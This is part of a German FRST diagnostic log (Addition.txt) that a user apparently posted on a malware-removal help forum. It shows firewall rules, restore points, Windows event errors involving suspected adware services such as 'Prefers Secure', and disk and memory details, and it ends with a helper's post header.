FirewallRules: [{2273E97C-579D-4FA8-86BA-38520D980DBC}] => (Allow) F:\Program Files\SteamApp\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{23C21ED4-D170-4379-B62D-760546632E2C}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{6E388D24-8CDE-49F5-BAC5-34409A3F4198}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{557300BC-6769-4539-9A2C-C36F297B39D8}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{ECC69094-7A17-4EB6-AB29-A3CB2826E7B5}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Borderlands 2\Binaries\Win32\Launcher.exe
FirewallRules: [{155E3520-5F62-405B-9BEC-EC94A30CA861}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{70951E33-A35F-4270-84B8-9433AADA84DF}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{B47E0FDE-2CD3-4025-A123-53B7C4532A49}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Borderlands 2\Binaries\Win32\Borderlands2.exe
FirewallRules: [{8EAF2738-3D40-4DDA-BA81-5FE173ECA58C}] => (Allow) F:\Program Files\SteamApp\steamapps\common\The Evil Within Demo\EvilWithinDemo.exe
FirewallRules: [{8BF82326-DD38-410C-A255-8C107DC95FC8}] => (Allow) F:\Program Files\SteamApp\steamapps\common\The Evil Within Demo\EvilWithinDemo.exe
FirewallRules: [{4430739E-B1BA-448D-8840-29A87D535CED}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{1884BDB9-BADE-41B5-8E17-BBAEEF86E648}] => (Allow) F:\Program Files\SteamApp\steamapps\common\Fallout 4\Fallout4Launcher.exe
FirewallRules: [{9040095F-4106-4C7C-9C70-EA95141B08A5}] => (Allow) C:\Program Files (x86)\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{D74E4216-5C25-4F49-BD9A-44907923C886}] => (Allow) C:\Users\Dominik\AppData\Local\TNT2\2.0.0.2101\TNT2User.exe
FirewallRules: [{7449A525-AB53-4D3C-A586-D0DE65023050}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [{511E9E47-0709-4895-949F-A5EE5D5D0F47}] => (Allow) C:\Program Files (x86)\PremierOpinion\pmropn.exe
FirewallRules: [{EC0132A4-8243-45DA-B433-1ABBCA249702}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [{C31C5375-9D0D-4222-8CC6-D73BB6FA1CED}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{35DFC063-5811-4A7D-AD8F-AAC0725960F7}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr.exe
FirewallRules: [{3154E5D9-F099-4796-A954-A432C9F7D19B}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe
FirewallRules: [{E9B0A91A-EFA2-4F34-90B9-F09CBCF93836}] => (Allow) C:\Program Files (x86)\Raptr Inc\Raptr\raptr_im.exe

==================== Wiederherstellungspunkte =========================

06-03-2017 20:21:08 Wiederherstellungsvorgang
09-03-2017 20:40:06 UnHackMe Malware Removal
09-03-2017 21:07:58 Wiederherstellungsvorgang
11-03-2017 15:20:34 Installed Etron USB3.0 Host Controller

==================== Fehlerhafte Geräte im Gerätemanager =============

Name: Teredo Tunneling Pseudo-Interface
Description: Microsoft-Teredo-Tunneling-Adapter
Class Guid: {4d36e972-e325-11ce-bfc1-08002be10318}
Manufacturer: Microsoft
Service: tunnel
Problem: : This device cannot start. (Code10)
Resolution: Device failed to start. Click "Update Driver" to update the drivers for this device.
On the "General Properties" tab of the device, click "Troubleshoot" to start the troubleshooting wizard.


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (03/12/2017 12:48:10 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm chrome.exe, Version 56.0.2924.87 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: 1784

Startzeit: 01d29a98d859b168

Endzeit: 60000

Anwendungspfad: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

Berichts-ID: 0359876a-06b4-11e7-9cf3-94de80bfdb2f

Error: (03/12/2017 12:40:26 AM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm IEXPLORE.EXE, Version 11.0.9600.18538 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: d10

Startzeit: 01d29a75dae43f23

Endzeit: 603

Anwendungspfad: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

Berichts-ID:

Error: (03/11/2017 08:54:54 PM) (Source: MsiInstaller) (EventID: 11723) (User: NT-AUTORITÄT)
Description: Product: Update_msi -- Error 1723. There is a problem with this Windows Installer package. A DLL required for this install to complete could not be run. Contact your support personnel or package vendor.  Action _406F2359_86D5_429B_A359_03A481E00443, entry: load, library: C:\Windows\Installer\MSI64B4.tmp

Error: (03/11/2017 03:20:06 PM) (Source: MsiInstaller) (EventID: 1013) (User: Dominik-PC)
Description: Product: Etron USB3.0 Host Controller -- This installation cannot be run by directly launching the MSI package. You must run setup.exe.

Error: (03/11/2017 03:15:40 PM) (Source: WinMgmt) (EventID: 10) (User: )
Description: Ereignisfilter mit Abfrage "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 99" konnte im Namespace "//./root/CIMV2" nicht reaktiviert werden aufgrund des Fehlers 0x80041003. Ereignisse können nicht durch diesen Filter geschickt werden, bis dieses Problem gelöst ist.

Error: (03/11/2017 03:14:17 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: Nettrans.exe, Version: 1.0.0.0, Zeitstempel: 0x58b841f5
Name des fehlerhaften Moduls: KERNELBASE.dll, Version: 6.1.7601.23572, Zeitstempel: 0x57fd0379
Ausnahmecode: 0xe0434352
Fehleroffset: 0x0000c54f
ID des fehlerhaften Prozesses: 0xab0
Startzeit der fehlerhaften Anwendung: 0x01d29a71bc310342
Pfad der fehlerhaften Anwendung: C:\ProgramData\PrefersSecure\Nettrans.exe
Pfad des fehlerhaften Moduls: C:\Windows\syswow64\KERNELBASE.dll
Berichtskennung: 02df0a39-0665-11e7-9cf3-94de80bfdb2f

Error: (03/11/2017 03:14:02 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Anwendung: Nettrans.exe
Frameworkversion: v4.0.30319
Beschreibung: Der Prozess wurde aufgrund einer unbehandelten Ausnahme beendet.
Ausnahmeinformationen: System.ArgumentNullException
   bei System.String.Join(System.String, System.String[])
   bei Application_Hosting.Service1..ctor(System.String[])
   bei Application_Hosting.Program.Main(System.String[])

Error: (03/11/2017 03:12:43 PM) (Source: ATIeRecord) (EventID: 16387) (User: )
Description: ATI EEU Service event error

Error: (03/11/2017 02:42:23 PM) (Source: MsiInstaller) (EventID: 11922) (User: Dominik-PC)
Description: Product: FMW 1 -- Error 1922. Service 'AVG Service' (avgsvc) could not be deleted.  Verify that you have sufficient privileges to remove system services.

Error: (03/11/2017 01:54:55 PM) (Source: MsiInstaller) (EventID: 11723) (User: NT-AUTORITÄT)
Description: Product: Update_msi -- Error 1723. There is a problem with this Windows Installer package. A DLL required for this install to complete could not be run. Contact your support personnel or package vendor.  Action _406F2359_86D5_429B_A359_03A481E00443, entry: load, library: C:\Windows\Installer\MSIEC2.tmp


Systemfehler:
=============
Error: (03/12/2017 12:49:54 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: Der Server "{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" konnte innerhalb des angegebenen Zeitabschnitts mit DCOM nicht registriert werden.

Error: (03/11/2017 03:15:40 PM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: Der Dienst "Prefs Secure" wurde nicht richtig gestartet.

Error: (03/11/2017 03:15:00 PM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "Superfetch" wurde mit folgendem Fehler beendet: 
Das System kann die angegebene Datei nicht finden.

Error: (03/11/2017 03:14:19 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Prefers Secure" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (03/11/2017 03:14:19 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst Prefers Secure erreicht.

Error: (03/11/2017 03:14:02 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Plays.tv Update Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (03/11/2017 03:14:02 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst Plays.tv Update Service erreicht.

Error: (03/11/2017 03:14:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Background Logic Handler" wurde aufgrund folgenden Fehlers nicht gestartet: 
Das System kann die angegebene Datei nicht finden.

Error: (03/11/2017 03:14:01 PM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "AVG Service" wurde aufgrund folgenden Fehlers nicht gestartet: 
Der Dienst antwortete nicht rechtzeitig auf die Start- oder Steuerungsanforderung.

Error: (03/11/2017 03:14:01 PM) (Source: Service Control Manager) (EventID: 7009) (User: )
Description: Das Zeitlimit (60000 ms) wurde beim Verbindungsversuch mit dem Dienst AVG Service erreicht.


CodeIntegrity:
===================================
  Date: 2016-06-26 22:35:53.476
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\drivers\atikmpag.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-06-26 22:35:53.476
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\drivers\atikmpag.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-06-26 22:24:32.616
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\drivers\atikmpag.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.

  Date: 2016-06-26 22:24:32.616
  Description: Windows konnte die Abbildintegrität der Datei "\Device\HarddiskVolume3\Windows\System32\drivers\atikmpag.sys" nicht überprüfen, weil der Dateihash nicht im System gefunden wurde. Möglicherweise wurde durch eine kürzlich durchgeführte Hardware- oder Softwareänderung eine falsch signierte oder beschädigte Datei oder eine Datei, bei der es sich um schädliche Software aus einer unbekannten Quelle handelt, installiert.


==================== Speicherinformationen =========================== 

Prozessor: AMD FX(tm)-8350 Eight-Core Processor 
Prozentuale Nutzung des RAM: 23%
Installierter physikalischer RAM: 8152.73 MB
Verfügbarer physikalischer RAM: 6260.45 MB
Summe virtueller Speicher: 16303.64 MB
Verfügbarer virtueller Speicher: 13937.14 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:111.69 GB) (Free:51.92 GB) NTFS
Drive e: () (Removable) (Total:28.97 GB) (Free:27.84 GB) FAT32
Drive f: (Volume) (Fixed) (Total:931.51 GB) (Free:866.09 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 111.8 GB) (Disk ID: D3222AFA)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=111.7 GB) - (Type=07 NTFS)

========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: BF74FA11)
Partition 1: (Not Active) - (Size=931.5 GB) - (Type=07 NTFS)

========================================================
Disk: 2 (Size: 29 GB) (Disk ID: 00000000)

Partition: GPT.

==================== Ende von Addition.txt ============================

11.03.2017, 23:47	#5
M-K-D-B /// TB-Ausbilder	Reimage Repair Werbung / Links öffnen nicht / Alle Browser hängen sich auf Hinweis 6. nochmal lesen und entsprechend ausführen.

Reimage Repair Werbung / Links öffnen nicht / Alle Browser hängen sich auf

Log-Analyse und Auswertung: Reimage Repair Werbung / Links öffnen nicht / Alle Browser hängen sich auf